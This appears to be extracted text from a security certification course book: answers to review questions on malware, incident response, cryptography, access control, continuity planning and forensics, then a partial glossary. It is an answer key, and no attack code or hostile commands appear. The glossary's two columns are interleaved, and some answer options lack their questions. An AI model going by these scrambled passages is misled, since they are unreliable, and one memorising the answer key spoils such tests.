about an employee's position, duties, and current projects. They may be able to
craft their attack to target employees who are particularly vulnerable.
False alarm.
False alarm.
3. Social engineering attempt or false alarm? The CEO of 515 Support needs to get
access to market research data immediately. You recognize her voice, but a
proper request form has not been filled out to modify the permissions. She states
that normally she would fill out the form and should not be an exception, but she
urgently needs the data.
False alarm.
1. While using your computer, an app window displays on your screen and tells you
that all of your files are encrypted. The app window demands that you make an
anonymous payment if you ever want to recover your data. You close the app
window and restart your computer, only to find that your personal files are all
scrambled and unreadable. What type of malware has infected your computer?
Ransomware.
2. Checking your email over a period of a week, you notice something unusual: the
spam messages that you've been receiving all seem to be trying to sell you
something closely related to the websites you happened to visit that day. For
example, on Monday you visited a subscription news site, and later that day you
noticed a spam email that solicited a subscription to that very news site. On
Tuesday, you browsed to an online retailer in order to buy a birthday gift for your
friend. The same gift you were looking at showed up in another spam email later
that night. What type of malware has infected your computer?
Spyware.
2. What is a CIRT?
A Cyber Incident Response Team—the first point of contact for incident notification and the
people primarily responsible for managing incident response.
3. True or false? It is important to publish all security alerts to all members of staff.
False—security alerts should be sent to those able to deal with them at a given level of security
awareness.
6. True or false? The "first responder" is whoever first reports an incident to the
CIRT.
False—the first responder would be the member of the CIRT to handle the report.
1. The first phase of the response process is preparation. What should you and your
team have done before today in order to prepare for these kinds of incidents?
Answers may vary, but on a fundamental level, the organization should have come up with a
response strategy and incorporated that into official policy. As part of this strategy, they should
have formulated a plan for internal and external communication during an incident; established
requirements for handling the incident; created a cyber incident response team (CIRT); ensured
that the CIRT has access to the resources it needs; and more.
2. Now that the incident is underway, you can move to the next phase:
detection and analysis. From what you know so far, what can you
determine about the nature of the incident? What is the source of the
issue? How is it propagating? What might the extent of the damage be
to the business if the issue goes unchecked?
Answers may vary. It's very likely, given what the help desk worker reported, that the
organization is the victim of ransomware that encrypts files and demands payment
in exchange for decryption. At this point, it's difficult to establish the source of the
ransomware and how it entered into the network. However, you can be reasonably
confident that this ransomware is also a worm, and is spreading from one host to
another through the network. If the spread of this ransomware worm is not
stopped, it may end up encrypting the local files of every employee in the
organization, and may even infect the network shares. This could lead to a loss of
critical data, making that data unavailable and thus negatively impacting business
operations.
3. Now that you've identified the nature of the incident, it's time to
contain it. What techniques would you suggest employing to stop the
spread of the incident, preventing it from harming the organization
any further?
Answers may vary. Because the worm appears to be spreading within a single
subnet at the moment, it would be prudent to further isolate this subnet from the
rest of the network. In addition to limiting the lines of communication, you may wish
to commandeer and quarantine all of the workstations that have been infected. This
may be necessary to further ensure that the worm cannot spread. As far as
containing the infection within each workstation, if the ransomware is still in the
process of encrypting files, you could try removing power to the device or
thoroughly terminating the ransomware application and any of its running services.
4. The threat has been contained and the infection has been removed
from all known systems and the organization is now actively
monitoring other critical systems for signs of the worm. The
organization has recovered as much data as it could, and the incident
response process is coming to a close. Before you can put this incident
behind you, however, you need to report on any lessons learned. What
might you include in this report?
Answers may vary. You should summarize the incident and your response, and
include any relevant timeline information to provide the proper context. You should
also document how successful the response was, and any improvements you might
suggest for the future. You might also suggest improvements to business operations
to prevent this kind of incident from happening again, or to at least minimize its
impact. For example, if you identify that the "patient zero" of the infection was a
user who was phished into downloading the worm, you may suggest that all
personnel undergo formal end user cybersecurity training with an emphasis on
defending against social engineering. If you identify that the worm entered your
network through a flaw in an unpatched OS or application, you may suggest a more
rigorous patch management process.
1. What are the two principal uses of network scanning tools in the context of
auditing?
Rogue system detection to locate hosts that are not authorized to communicate on the network
and network mapping to validate the topology of the network and presence of authorized hosts.
2. What command line tool would you use to identify the current network
addressing configuration of a wired adapter on a Linux host?
ip or ifconfig or ip a
3. What is the purpose of using the ping and arp tools together?
To obtain both the IP and MAC addresses of local hosts. Ping performs a connectivity test with a
host via its IP address. If the host is contacted, the Address Resolution Protocol (ARP) cache is
updated with its IP:MAC address mapping. The arp tool queries the cache to obtain the host's
MAC address.
4. Which command is used to query a DNS server for records from a Linux host?
dig
1. If you run netstat without switches on a Windows host, what output is shown?
The local and foreign addresses and TCP ports where the server port is in the "Established" or
"Wait" state, but not "Listening" ports.
1. Which part of a simple cryptographic system must be kept secret—the cipher, the
ciphertext, or the key?
In cryptography, the security of the message is guaranteed by the security of the key. The system
does not depend on hiding the algorithm or the message (security by obscurity).
2. True or false? Cryptography is about keeping things secret so they cannot be used
as the basis of a non-repudiation system.
False—the usages are not exclusive. There are different types of cryptography and some can be
used for non-repudiation. The principle is that if an encryption method (cipher and key) is known
only to one person, that person cannot then deny having composed a message. This depends on
the algorithm design allowing recipients to decrypt the message but not encrypt it.
1. What term is used to describe the state of data stored on the flash drive memory
of a smartphone?
Data at rest.
2. What is CryptoNG?
Cryptographic primitives must be implemented in software as a library of functions (a crypto
module) that can be called by other programs (Application Programming Interface [API]).
CryptoNG (CNG) is the main crypto-module for Windows (replacing the legacy CryptoAPI module).
8. You want to ensure that data stored on backup media cannot be read
by third parties. What type of security control should you choose?
You require a security control that delivers confidentiality that can work on large
amounts of data quickly, such as a symmetric encryption algorithm.
3. What type of certificate format can be used if you want to transfer your private
key from one host computer to another?
PKCS #12 / .PFX / .P12.
5. You are developing a secure web application. What sort of certificate should you
request to show that you are the publisher of a program?
A code signing certificate. Certificates are issued for specific purposes. A certificate issued for one
purpose should not be reused for other functions.
6. What extension field is used with a web server certificate to support the
identification of the server by multiple subdomain labels?
The Subject Alternative Name (SAN) field.
1. What are the potential consequences if a company loses a private key used in
encrypted communications?
It puts both data confidentiality and identification and authentication systems at risk. Depending
on the key usage, the key may be used to decrypt data with authorization. The key could also be
used to impersonate a user or computer account.
2. What is an HSM?
A hardware security module (HSM) is any type of system for performing cryptographic operations
and storing key material securely. An HSM is usually provisioned as a network-connected
appliance, but it could also be a portable device connected to a PC management station or a plug-
in card for a server.
4. What are the four main inputs for something you are technologies?
The most popular biometric factors are fingerprint, iris, retina, and facial
recognition.
6. True or false? An account requiring a password, PIN, and smart card is an example
of three-factor authentication.
False—Three-factor authentication would also include a biometric, behavioral, or location-based
element. Also, note that the password and PIN elements are the same factor (something you
know).
1. True or false? In order to create a service ticket, Kerberos passes the user's
password to the target application server for authentication.
False—only the KDC verifies the user credential. The Ticket Granting Service sends the user's
account details (SID) to the target application for authorization (allocation of permissions), not
authentication.
3. A user maintains a list of commonly used passwords in a file located deep within
the computer's directory structure. Is this secure password management?
No. This is security by obscurity. The file could probably be easily discovered using search tools.
2. Apart from cost, what would you consider to be the major considerations for
evaluating a biometric recognition technology?
Error rates (false acceptance and false rejection), throughput, and whether users will accept the
technology or reject it as too intrusive or threatening to privacy.
5. You are working with a cloud services company to use their identity
management services to allow users to authenticate to your network.
The company will not establish a transitive trust between their
network system and yours to allow you to access and update user
profiles. Why would they refuse this and what impact will it have on
your application?
They would have to obtain user consent for your network to access their profile and
this may be difficult for them to do. You will have to create and store a profile for
the user on your own system.
6. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application.
Which protocols would you consider and which would you choose as
most suitable?
Security Association Markup Language (SAML) and Oauth + OpenID Connect (OIDC).
OAuth with OIDC as an authentication layer offers better support for native mobile
apps so is probably the best choice.
3. True or false? A "Need to Know" policy can only be enforced using discretionary or
role-based access control.
False—a mandatory access control system supports the idea of domains or compartments to
supplement the basic hierarchical system.
5. In a rule-based access control model, can a subject negotiate with the data owner
for access privileges? Why or why not?
This sort of negotiation would not be permitted under rule-based access control; it is a feature of
discretionary access control.
1. What container would you use if you want to apply a different security policy to a
subset of objects within the same domain?
Organization Unit (OU).
2. What is the process of ensuring accounts are only created for valid users, only
assigned the appropriate privileges, and that the account credentials are known
only to the valid user?
Onboarding.
3. What is the policy that states users should be allocated the minimum sufficient
permissions?
Least privilege.
5. What is the name of the policy that prevents users from choosing old
passwords again?
Enforce password history.
2. What is the purpose (in terms of security) and what are the means of
segmenting a network?
Segmentation means that information security is not wholly dependent on network
perimeter security. A network segment can be physically isolated, either by
completely air gapping it or by using physically separate switches and cabling. More
typically, network segments are isolated using the Virtual LAN (VLAN) features of
switches. Each VLAN is assigned a separate subnet and traffic between VLANs must
be routed (and inspected by firewalls). OS and network hypervisor-based
virtualization is another means of logically segregating hosts.
3. What is the distinction between the Internet zone and an extranet zone?
The Internet is an external zone where none of the hosts accessing your services can be assumed
trusted or authenticated. An extranet is a zone allowing controlled access to semi-trusted hosts,
implying some sort of authentication. The hosts are semi-trusted because they are not under the
administrative control of the organization (as they are owned by suppliers, customers, business
partners, contractors, and so on).
1. Why would you deploy a layer 3 switch in place of an ordinary LAN switch?
A layer 3 switch can perform a routing function to forward (or drop) traffic between subnets
configured on different VLANs. On an enterprise network with thousands of access ports, this is
usually more efficient than forwarding the traffic via a separate router.
4. How could you prevent a malicious attacker from engineering a switching loop
from a host connected to a standard switch port?
Enable the appropriate guards on non-trunk ports.
6. What steps would you take to secure a network device against unauthorized
reconfiguration?
Enable a single management interface or protocol (preferably encrypted), secure the
administrative account with a strong password or set up an ACL, and update firmware when
necessary. If the device has an external (Internet-facing) interface, restrict access to the
management console to a management subnet (alternatively, restrict access to a single host).
1. What is EAPoL?
A switch that support 802.1X port-based access control can enable a port but allow
only the transfer of Extensible Authentication Protocol over LAN (EAPoL) traffic. This
allows the client device and/or user to be authenticated before full network access is
granted.
1. True or False? As they protect data at the highest layer of the protocol stack,
application-based firewalls have no basic packet filtering functionality.
False. All firewall types can perform basic packet filtering (by IP address, protocol type, port
number, and so on).
3. What is a WAF?
A web application firewall (WAF) is designed to protect HTTP and HTTPS applications. It can be
configured with signatures of known attacks against applications, such as injection-based attacks
or scanning attacks.
1. What is the best option for monitoring traffic passing from host-to-
host on the same switch?
The only option for monitoring intra-switch traffic is to use a mirrored port.
7. If a Windows system file fails a file integrity check, should you suspect
a malware infection?
Yes—malware is a likely cause that you should investigate.
8. If you suspect a process of being used for data exfiltration but the
process is not identified as malware by A-V software, what types of
analysis tools will be most useful?
Use a process monitor to see which files the process interacts with and a network
monitor to see if it opens (or tries to open) a connection with a remote host.
2. A user reports that an essential design draft document has disappeared and in its
place is a file describing a policy violation. Should you suspect the reporting user
of having attempted to exfiltrate the data?
Not necessarily. The Data Loss Prevention (DLP) solution might have been configured to
quarantine the file for all users if any policy violation was detected. You should check the DLP
monitor alerts or logs.
3. What mechanisms does cloud-based DLP use to prevent data loss from cloud
services?
The solution can either use a proxy to mediate access or the cloud service provider's API to
perform scanning and policy enforcement.
2. What is the difference between a sensor and a collector, in the context of SIEM?
A SIEM collector parses input (such as log files or packet traces) into a standard format that can be
recorded within the SIEM and interpreted for event correlation. A sensor collects data from the
network media.
5. What difficulty is inherent in monitoring the way users exercise privileges granted
to them (to access particular files, for instance)?
This is likely to generate a large amount of raw data (numerous events), which will be difficult to
analyze.
4. You need to configure a wireless bridge between two sites. What type
of wireless network technology will be most useful?
A wireless bridge will benefit from the use of a particular antenna type. A directional
antenna will work better than an omnidirectional one.
5. You want to deploy a wireless network where only clients with domain-issued
digital certificates can join the network. What type of authentication mechanism
is suitable?
EAP-TLS is the best choice because it requires that both server and client be installed with valid
certificates.
6. John is given a laptop for official use and is on a business trip. When he arrives at
his hotel, he turns on his laptop and finds a wireless access point with the name
of the hotel, which he connects to for sending official communications. He may
become a victim of which wireless threat?
Evil twin.
2. What types of physical security controls would you suggest for the main server
room?
Answers will vary, but should be focused on access controls surrounding the room such as door
locks with identification systems, surveillance systems, motion detectors, and possibly an alarm
system.
6. Where would you expect to find "hot and cold" aisles and what is their purpose?
This layout is used in a data center or large server room. The layout is the best way to maintain a
stable temperature and reduce loss of availability due to thermal problems.
7. What physical security device could you use to ensure the safety of
onsite backup tapes?
A fireproof safe.
4. Why are OS-enforced file access controls not sufficient in the event of
the loss or theft of a computer or mobile device?
The disk (or other storage) could be attached to a foreign system and the
administrator could take ownership of the files. File-level or Full Disk Encryption
(FDE) mitigates this by requiring the presence of the user's decryption key to read
the data.
2. Why is it essential to follow a baseline when setting up a system for the first time?
Unless you know where you started, you won't know how far you've come. Security monitoring
and accounting largely depends on identifying things that are out-of-the-ordinary. Baselining a
system establishes what is normal.
6. What first step must you take when configuring automatic updates on a Linux
server?
Choose a trustworthy installation source.
7. Why are end-of-life systems and lack of vendor support distinct from one another
as vulnerability management challenges?
An end-of-life system is one where the vendor has previously announced a timescale for
withdrawing support in terms of providing patches and updates. Lack of vendor support is a
situation where the vendor refuses to fix known issues even though the product might remain on
sale or where a product is no longer supported because the original vendor or developer in no
longer available.
1. What type of deployment model(s) allow users to select the mobile device make
and model?
Bring Your Own Device (BYOD) and Choose Your Own Device (CYOD).
4. An employee's car was recently broken into, and the thief stole a
company tablet that held a great deal of sensitive data. You've already
taken the precaution of securing plenty of backups of that data. What
should you do to be absolutely certain that the data doesn't fall into
the wrong hands?
Remotely wipe the device.
6. Why would you need to deploy SATCOM and what sort of assessments
should you make?
Satellite Communications (SATCOM) provides near global coverage so is used for
telecommunications in remote areas. You need to assess service providers to
ensure that they have vulnerability management procedures for receivers and
handsets and that the communications links use secure encryption.
11.What is containerization?
A mobile app or workspace that runs within a partitioned environment to prevent
other (unauthorized) apps from interacting with it.
1. What are SCADA devices and what are the security issues associated with them?
Supervisory Control and Data Acquisition Systems are large-scale control systems used in systems
such as manufacturing and fabrication. The two great security issues with SCADA devices stem
from the fact that so many of them are legacy and, therefore, built without an eye to security and
without the awareness that they would one day be networked. Securing devices such as these
after the fact can therefore, by its nature, be extremely difficult.
2. Why should detailed vendor and product assessments be required before allowing
the use of IoT devices in the enterprise?
As systems with considerable computing and networking functionality, these devices are subject
to the same sort of vulnerabilities and exploits as ordinary workstations and laptops. It is critical
to assess the vendor's policies in terms of the security design for the product and support for
identifying and mitigating any vulnerabilities discovered in its use.
3. What is a UAV?
An Unmanned Aerial Vehicle (UAV) is more popularly referred to as a drone.
3. True or false? The contents of the HOSTS file are irrelevant as long as a DNS
service is properly configured.
False (probably)—the contents of the HOSTS file are written to the DNS cache on startup. It is
possible to edit the registry to prioritize DNS over HOSTS, though.
5. True or false? DNSSEC depends on a chain of trust from the root servers down.
True.
3. What IPSec mode would you use for data confidentiality on a private
network?
Transport mode with Encapsulating Security Payload (ESP). Tunnel mode encrypts
the IP header information, but this is unnecessary on a private network.
Authentication Header (AH) provides message authentication and integrity but not
confidentiality.
2. How does SSL accomplish the secure exchange of session keys using certificates?
If using RSA key exchange, the server sends its certificate to the client, which uses the public key
in the certificate to encrypt a pre-master secret. The client and server then calculate the same
master secret and use that to create the session key. Alternatively, the Diffie-Hellman key
agreement protocol can be used to generate an ephemeral session key, which does not depend
on the continued security of the server's private key.
3. A client and server have agreed on the use of the cipher suite ECDHE-ECDSA-
AES256-GCM-SHA384 for a TLS session. What is the key strength of the symmetric
encryption algorithm?
256-bit (AES).
1. Which port(s) and security methods should be used by a mail client to submit
messages for delivery by an SMTP server?
Port 587 with STARTTLS (explicit TLS) or port 465 with implicit TLS.
2. What is a VDE?
A Virtual Desktop Environment (VDE) is the workspace presented when accessing an
instance in a virtual desktop infrastructure (VDI) solution. VDI is the whole solution
(host server and virtualization platform, connection protocols, connection/session
broker, and client access devices).
3. Why could the risk of a single point of failure be higher when virtual
servers are deployed?
The failure of a single hardware host or physical network link to the host could
disrupt multiple virtual server instances and applications.
2. Which two metrics must you reduce in order to meet an MTD target?
In order to meet the maximum tolerable downtime (MTD) for a business function,
the Recovery Time Objective (RTO) and Work Recovery Time (WRT) of any systems
that support it cannot exceed the MTD value.
3 hours
6 hours
9 hours
12 hours
2. Did Develetech meet its RPO? Why or why not? What changes would you suggest,
if any?
Develetech did not meet its RPO. The last backup was 12 hours before the event, but the
company's RPO is only 6 hours. This means there are 6 hours worth of unrecoverable data that
the organization could not tolerate losing. Develetech should increase the frequency of its
backups in order to meet the RPO.
6 hours
8 hours
2 days
3 days
6 hours
8 hours
2 days
3 days
5. Assume that there are 100 servers, and the administrators can only
recover 20 at a time before moving on to the next 20. Does this cause a
conflict with the organization's RTO? Why or why not?
This does not necessarily cause a conflict with the organization's RTO. If the MTTR is
8 hours, then it will take 40 hours to recover 5 sets of 20 servers. Since 40 hours is
less than the RTO of 2 days (48 hours), the organization can still hit its objective.
2 days
3 days
4 days
5 days
7. Assume that Develetech does not reach its RTO, and actually exceeds
its MTD before the storefront is fully operational again. What impact
might this have on the business?
Answers may vary. The most prominent impact will be the hit the organization takes
to its finances. Because the storefront is Develetech's revenue leader, the lack of
transactions for more than 3 days will impact its ability to sustain its own
operational costs, as well as cause its market value to plummet. While less
quantifiable, Develetech's reputation will likely be impacted as well. A customer
backlash to the outage may tarnish the company's brand irrevocably.
Qualitatively, using downtime terms such as "Extremely rarely unavailable," "Very rarely
unavailable," "Rarely unavailable," etc.
Qualitatively, using uptime terms such as "Extremely highly available," "Very highly available,"
"Highly available," etc.
3. What phrase describes ensuring that critical functions remain properly staffed in
the event of employee fatalities?
Succession planning.
4. In which types of recovery site(s) would you expect to have to install computer
equipment?
While definitions vary, this is typically true of cold sites only. Warm sites have existing processing
capability but not the latest data set, as hot sites would have.
5. What security considerations affect an alternate hot site that do not generally
apply to warm or cold sites?
Hot sites are generally kept live with a current data set, requiring duplication of security measures
required to secure the resources, especially if the site is not fully manned or occupied.
10.As part of its backup process, Develetech created a backup of its entire
customer records database on Monday. On Tuesday, Develetech
created a backup only from the changes made between Monday and
Tuesday. On Wednesday, Develetech created a backup only from the
changes made between Monday and Wednesday. What type of backup
is Develetech doing?
Full
Incremental
Snapshot
Differential
4. Why might a file time stamp not show the time at which a crime was committed?
The time stamp may record the Universal Coordinated Time rather than the local time. An offset
would need to be applied (and it might need to be demonstrated that the computer's time zone
was correctly set).
5. You've fulfilled your role in the forensic process and now you plan on handing the
evidence over to an analysis team. What important process should you observe
during this transition, and why?
It's important to uphold a record of how evidence is handled in a chain of custody. The chain of
custody will help verify that everyone who handled the evidence is accounted for, including when
the evidence was in each person's custody. This is an important tool in validating the evidence's
integrity.
6. How might "big data" assist with a forensic examination of a computer hard
drive?
"Big data" visualization or frequency analysis might help to identify information stored on the
disk. Often this lets information to be shown in a graphical or pictorial form, which allows patterns
to emerge that may not be obvious when looking at the data using traditional methods.
1. Why might an integer overflow exploit in a web application lead to data loss?
If the integer overflow can be exploited to gain access to privileged memory, the attacker may be
able to steal information or install malware.
3. Which of the following software vulnerabilities occurs when certain events fail to
execute in the intended order?
Resource exhaustion.
Race condition.
Buffer overflow.
Pointer dereference.
1. What is an SOP?
A standard operating procedure (SOP) is a step-by-step listing of the actions that must be
completed for any given task.
1. What is the difference between the role of data steward and the role of data
custodian?
The data steward role is concerned with the quality of data (format, labeling, normalization, and
so on). The data custodian role focuses on the system hosting the data assets and its access
control mechanisms.
4. What are satisfactory ways of protecting confidential data stored on a hard disk
for disposal of the disk?
Overwriting is secure enough for most purposes. Top secret data may mandate destruction of the
unit. The disk could be disposed of relatively safely if all confidential information were encrypted,
but it would be pointless to leave the data on the disk for the sake of it.
2. Which of the following policies do you think are the most relevant to
management's security concerns as noted in the scenario?
Answers may vary, but the most relevant policies are likely to be Acceptable Use
Policy, Clean Desk Policy, Email Policy, Password Construction Guidelines, and
Password Protection Policy.
6. Review the actual policy statements. Are there any items you would consider
adding to the policy, or any you would remove? Why?
Answers will vary. In general, students may see certain items as being too restrictive, or they may
note the lack of a certain item they feel is important.
7. Several of the policies in the General category prescribe behavior for all users,
regardless of role. Other than handing users the policy document and requiring
them to sign in, how else might you ensure that they understand the importance
of the security practices contained in these policies?
Answers may vary, but cybersecurity training, especially awareness training, is most effective at
communicating these ideas to end users. Successful training programs usually involve more than
just providing users with reading material; rather, face-to-face knowledge transfer and interactive
learning will go a long way in fostering a culture of cybersecurity in the organization.
AH anti-virus scanner
(Authentication Header) An IPSec Software capable of detecting and
protocol that provides authentication for removing virus infections and (in most
the origin of transmitted data as well as cases) other types of malware, such as
integrity and protection against replay worms, Trojans, rootkits, adware,
attacks. spyware, password crackers, network
mappers, DoS tools, and so on.
air gap
A type of network isolation that AP
physically separates a network from all (access point) A device that provides a
other networks. connection between wireless devices
and can connect to wired networks.
ALE
(Annual Loss Expectancy) The total cost API
of a risk to an organization on an annual (application programming interface) A
basis. This is determined by multiplying library of programming utilities used, for
the SLE by the annual rate of occurrence example, to enable software developers
(ARO). to access functions of the TCP/IP
network stack under a particular
algorithm operating system.
Any defined method of performing a
process, but in encryption, the term appliance firewall
specifically refers to the technique used A standalone hardware device that
to encrypt a message. performs only the function of a firewall,
which is embedded into the appliance's
amplification attack firmware.
A network-based attack where the
attacker dramatically increases the application aware firewall
bandwidth sent to a victim during a A Layer 7 firewall technology that
DDoS attack by implementing an inspects packets at the Application layer
amplification factor. of the OSI model.
birthday attack
A type of password attack that exploits
weaknesses in the mathematical
clustering control
A load balancing technique where a group See security control.
of servers are configured as a unit and
work together to provide network services. cookie
Text file used to store information about a
COBIT user when they visit a website. Some sites
(Control Objectives for Information and still use cookies to support user sessions.
Related Technologies) An IT governance
framework with security as a core COOP
component. COBIT is published by ISACA See business continuity plan.
and is a commercial product, available
through APMG International. corporate security policy
See security policy.
code signing
A form of digital signature that guarantees counter mode
that source code and application binaries An encryption mode of operation where a
are authentic and have not been tampered numerical counter value is used to create a
with. constantly changing IV. Also referred to as
CTM (counter mode) and CM (counter
mode).
CRL cybersquatting
(certificate revocation list) A list of A DNS attack in which an adversary
certificates that were revoked before their acquires a domain of a trusted brand or
expiration date. company, or a variation of its spelling.
cryptanalysis DAC
The art of breaking or "cracking" (discretionary access control) Access
cryptographic systems. control model where each resource is
protected by an Access Control List (ACL)
crypto module managed by the resource's owner (or
Algorithms underpinning cryptography owners).
that are interpreted and packaged as a
computer program or programming data at rest
library. Information that is primarily stored on
specific media, rather than moving from
cryptographic access control one medium to another.
A "something you have" authentication
system where the user is given a smart data custodian
card that stores a digital certificate issued An individual who is responsible for
to the user by a certificate authority. To managing the system on which data assets
authenticate, the user presents the card to are stored, including being responsible for
the reader and inputs a PIN (which enforcing access control, encryption, and
protects against use of a stolen card). backup/recovery measures.
diffusion DLP
A cryptographic technique that makes (data loss/leak prevention) A software
ciphertext change drastically upon even solution that detects and prevents
the slightest changes in the plaintext input. sensitive information in a system or
network from being stolen or otherwise
dig falling into the wrong hands.
(domain information groper) Utility to
query a DNS and return information about DMZ
a particular domain name. (Demilitarized Zone) A small section of a
private network that is located behind one
digital certificate firewall or between two firewalls and
An electronic document that associates made available for public access.
credentials with a public key.
DNAT
digital signature (destination network address translation)
A message digest that has been encrypted See port forwarding.
again with a user's private key.
DNS
directory (Domain Name System) The service that
A database that stores information about maps names to IP addresses on most
users, data, and other entities in a TCP/IP networks, including the Internet.
hierarchical format.
DNS harvesting
directory services Using open source intelligence (OSINT) to
A network service that stores identity gather information about a domain
information about all the objects in a (subdomains, hosting provider,
particular network, including users, administrative contacts, and so on).
groups, servers, client computers, and
printers. DNS server cache poisoning
A network-based attack where an attacker
directory traversal exploits the traditionally open nature of
An application attack that allows access to the DNS system to redirect a domain
commands, files, and directories that may name to an IP address of the attacker's
or may not be connected to the web choosing.
document root directory.
DNSSEC
disposal (Domain Name System Security
Information security and environmental Extensions) A security protocol that
damage issues when decommissioning provides authentication of DNS data and
out-of-date or used systems. upholds DNS data integrity.
escalation fat AP
In terms of privilege management, An access point whose firmware contains
escalation (or elevation) is where a user enough processing logic to be able to
gains additional privileges without function autonomously and handle clients
authorization. In the context of incident without the use of a wireless controller.
response, escalation is the process of
involving additional senior staff to assist in fault tolerance
incident management. Protection against system failure by
providing extra (redundant) capacity.
escrow Generally, fault tolerant systems identify
In key management, the storage of a and eliminate single points of failure.
backup key with a third party.
FDE
evil twin (Full Disk Encryption) Encryption of all data
A wireless access point that deceives users on a disk (including system files,
into believing that it is a legitimate network temporary files, and the pagefile) can be
access point. accomplished via a supported OS, third-
party software, or at the controller level by
execution control the disk device itself.
The process of determining what
additional software may be installed on a FIM
client or server beyond its baseline to (file integrity monitoring) A type of
prevent the use of unauthorized software. software that reviews system files to
ensure that they have not been tampered
with.
fingerprinting gain
Identifying the type and version of an The reliable connection range and power
operating system (or server application) by of a wireless signal, measured in decibels.
analyzing its responses to network scans.
gateway
firewall In physical security, a wall with a door or a
A software or hardware device that fence with a gate, that allows movement
protects a system or network by blocking from one area to another.
unwanted network traffic.
GCM
first responder (Galois/Counter Mode) An encryption
The first experienced person or team to mode of operation that adds
arrive at the scene of an incident. authentication to the standard encryption
services of a cipher mode.
flood guard
A security control in network switches that geofencing
protects hosts on the switch against SYN The practice of creating a virtual boundary
flood and ping flood DoS attacks. based on real-world geography.
forensics geolocation
The process of gathering and submitting The identification or estimation of the
computer evidence to trial. Digital physical location of an object, such as a
evidence is latent, meaning that it must be radar source, mobile phone, or Internet-
interpreted. This means that great care connected computing device.
must be taken to prove that the evidence
has not been tampered with or falsified. GPG
(Gnu Privacy Guard) A popular open-
frequency analysis source implementation of PGP.
A cryptographic analysis technique where
an attacker identifies repeated letters or GPO
groups of letters and compares them to (Group Policy Object) On a Windows
how often they occur in plaintext, in an domain, a way to deploy per-user and per-
attempt to fully or partially reveal the computer settings such as password
plaintext message. policy, account restrictions, firewall status,
and so on.
FTK
(Forensic Toolkit) A commercial digital GPS
forensics investigation management and (Global Positioning System) Means of
utilities suite, published by AccessData. determining a receiver's position on the
Earth based on information received from
FTP GPS satellites. The receiver must have line-
(File Transfer Protocol) A communications of-sight to the GPS satellites.
protocol that enables the transfer of files
between a user's workstation and a group account
remote host. A group account is a collection of user
accounts that are useful when establishing
full backup file permissions and user rights because
A backup type in which all selected files, when many individuals need the same
regardless of prior state, are backed up. level of access, a group could be
established containing all the relevant
fuzzing users.
A dynamic code analysis technique that
involves sending a running application hardware lock
random and unusual input so as to Devices can be physically secured against
evaluate how the app responds. theft using cable ties and padlocks. Some
systems also feature lockable faceplates,
heuristics hotfix
A technique that leverages past behavior A patch that is often issued on an
to predict future behavior. emergency basis to address a specific
security flaw.
HIDS
(host-based intrusion detection system) A HOTP
type of IDS that monitors a computer (HMAC-based One-time Password) An
system for unexpected behavior or drastic algorithm that generates a one-time
changes to the system's state. password using a hash-based
authentication code to verify the
high availability authenticity of the message.
The property that defines how closely
systems approach the goal of providing HSM
data availability 100 percent of the time (hardware security module) An appliance
while maintaining a high level of system for generating and storing cryptographic
performance. keys. This sort of solution may be less
susceptible to tampering and insider
HIPAA threats than software-based storage.
U.S. federal law that protects the storage,
reading, modification, and transmission of HTTP
personal health care data. (HyperText Transfer Protocol) The protocol
used to provide web content to browsers.
HMAC HTTP uses port 80. HTTPS(ecure) provides
(hash-based message authentication code) for encrypted transfers, using SSL/TLS and
A method (described in RFC-2104) used to port 443.
verify both the integrity and authenticity of
a message by combining cryptographic HVAC
hash functions, such as MD5 or SHA-1, (Heating, Ventilation, Air Conditioning)
with a secret key. Building control systems maintain an
optimum heating, cooling, and humidity
hoax level working environment for different
An email-based, IM-based, or web-based parts of the building.
attack that is intended to trick the user
into performing unnecessary or undesired hybrid password attack
actions, such as deleting important system An attack that uses multiple attack
files in an attempt to remove a virus, or methods, including dictionary, rainbow
sending money or important information table, and brute force attacks when trying
via email or online forms. to crack a password.
IaaS IMAP
(Infrastructure as a Service) A computing (Internet Message Access Protocol) TCP/IP
method that uses the cloud to provide any application protocol providing a means for
or all infrastructure needs. a client to access email messages stored in
a mailbox on a remote server. IMAP4
IAM utilizes TCP port number 143.
(Identity and Access Management) A
security process that provides implicit deny
identification, authentication, and A basic principle of security stating that
authorization mechanisms for users, unless something has explicitly been
computers, and other entities to work with granted access, it should be denied access.
organizational assets like networks,
operating systems, and applications. incident response policy
Procedures and guidelines covering
ICS appropriate priorities, actions, and
(Industrial Control System) A network responsibilities in the event of security
managing embedded devices (computer incidents.
systems that are designed to perform a
specific, dedicated function). incremental backup
A backup type in which all selected files
identification that have changed since the last full or
The process by which a user account (and incremental backup (whichever was most
its credentials) is issued to the correct recent) are backed up.
person. Sometimes referred to as
enrollment. input validation
Limits what data a user can enter into
IDS specific fields, like not allowing special
(intrusion detection system) A software characters in a username field.
and/or hardware system that scans,
audits, and monitors the security integrity
infrastructure for signs of attacks in The fundamental security goal of keeping
progress. organizational information accurate, free
of errors, and without unauthorized
ifconfig command modifications.
A UNIX/Linux-based utility used to gather
information about the IP configuration of interception proxy
the network adapter or to configure the Software that sits between a client and
network adapter. It has been replaced with server (a Man-in-the-Middle) and allows
the ip command in most Linux requests from the client and responses
distributions. from the server to be analyzed and
modified.
IIS
(Internet Information Services) The web intranet
server product shipped with Windows. A private network that is only accessible by
the organization's own personnel.
IM
(instant messaging) Real-time text iOS
communications products that also The operating system for Apple's iPhone
support file exchange and remote smartphone and iPad tablet.
desktop.
IoT
imaging (Internet of Things) A group of objects
Copying the structure and contents of a (electronic or not) that are connected to
physical disk device or logical volume to a the wider Internet by using embedded
single file, using a tool such as dd. electronic components.
IP IV
(intellectual property) See proprietary (initialization vector) A technique used in
information. cryptography to generate random
numbers to be used along with a secret
ip command key to provide data encryption.
A Linux-based utility used to gather
information about the IP configuration of IV attack
the network adapter or to configure the (Initialization Vector Attack) A wireless
network adapter. Replaces the older attack where the attacker is able to predict
ifconfig command. or control the IV of an encryption process,
thus giving the attacker access to view the
IP spoofing encrypted data that is supposed to be
An attack in which an attacker sends IP hidden from everyone else except the user
packets from a false (or spoofed) source or network.
address to communicate with targets.
Java
ipconfig command Programming language used to create web
A Windows-based utility used to gather server applications (J2EE) and client-side
information about the IP configuration of a applications (running in the Java VM).
workstation.
JavaScript
IPS Scripting language used to add
(Indoor Positioning System) A means of interactivity to web pages and HTML-
deriving a device's location when indoors, format email.
by triangulating its proximity to radio
sources such as Bluetooth beacons or job rotation
WAPs. The policy of preventing any one individual
performing the same role or tasks for too
IPSec long. Personnel should rotate between job
(Internet Protocol Security) A set of open, roles to prevent abuses of power, reduce
